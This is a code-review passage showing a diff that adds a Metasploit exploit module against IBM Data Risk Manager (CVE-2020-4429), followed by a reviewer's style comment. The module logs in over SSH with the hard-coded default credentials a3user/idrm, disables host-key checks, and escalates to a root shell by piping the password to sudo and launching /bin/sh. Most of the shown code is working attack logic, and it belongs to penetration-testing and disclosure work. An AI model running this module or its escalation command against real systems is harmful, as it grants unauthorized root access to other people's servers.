modules/exploits/linux/ssh/ibm_drm_a3user.rb

```diff
@@ -0,0 +1,146 @@
+          via SSH. This can be escalate to a full root access, as 'a3user' has sudo access with the default password.
+          At the time of disclosure, this is a 0 day. Versions <= 2.0.3 are confirmed to be
+          affected, and the latest 2.0.6 is most likely affected too.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module
+          ],
+        'References' =>
+          [
+            [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md' ],
+            [ 'URL', 'https://seclists.org/fulldisclosure/2020/Apr/33' ],
+            [ 'CVE', '2020-4429' ],   # insecure default password
+          ],
+        'DefaultOptions' =>
+          {
+            'EXITFUNC' => 'thread'
+          },
+        'Payload' =>
+          {
+            'Compat' => {
+              'PayloadType' => 'cmd_interact',
+              'ConnectionType' => 'find'
+            }
+          },
+        'Platform' => 'unix',
+        'Arch' => ARCH_CMD,
+        'Targets' =>
+          [
+            [ 'IBM Data Risk Manager <= 2.0.3 (<= 2.0.6 possibly affected)', {} ]
+          ],
+        'Privileged' => true,
+        'DefaultTarget' => 0,
+        'DisclosureDate' => 'Apr 21 2020'
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(22),
+        OptString.new('USERNAME', [true, 'Username to login with', 'a3user']),
+        OptString.new('PASSWORD', [true, 'Password to login with', 'idrm']),
+      ], self.class
+    )
+
+    register_advanced_options(
+      [
+        OptBool.new('SSH_DEBUG', [false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
+        OptInt.new('SSH_TIMEOUT', [false, 'Specify the maximum time to negotiate a SSH session', 30])
+      ]
+    )
+  end
+
+  def on_new_session(client)
+    print_status("#{rhost}:#{rport} - Escalating privileges to root, please wait a few seconds...")
+    # easiest way I found to get passwordless root, not sure if there's a shorter command
+    client.shell_command_token("echo #{datastore['PASSWORD']} | sudo -S 'echo 2>/dev/null'; sudo /bin/sh")
+    print_good("#{rhost}:#{rport} - Done, enjoy your root shell!")
+  end
+
+  def rhost
+    datastore['RHOST']
+  end
+
+  def rport
+    datastore['RPORT']
+  end
+
+  def do_login(user, pass)
+    factory = ssh_socket_factory
+    opts = {
+      auth_methods: ['password', 'keyboard-interactive'],
+      port: rport,
+      use_agent: false,
+      config: false,
+      password: pass,
+      proxy: factory,
+      non_interactive: true,
+      verify_host_key: :never
+    }
+
+    opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
+
+    begin
+      ssh = nil
+      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+        ssh = Net::SSH.start(rhost, user, opts)
+      end
+    rescue Rex::ConnectionError
+      return
```

Comment:
`print_error`? All of these should probably be `fail_with`, but I'm not gonna push too hard on it now.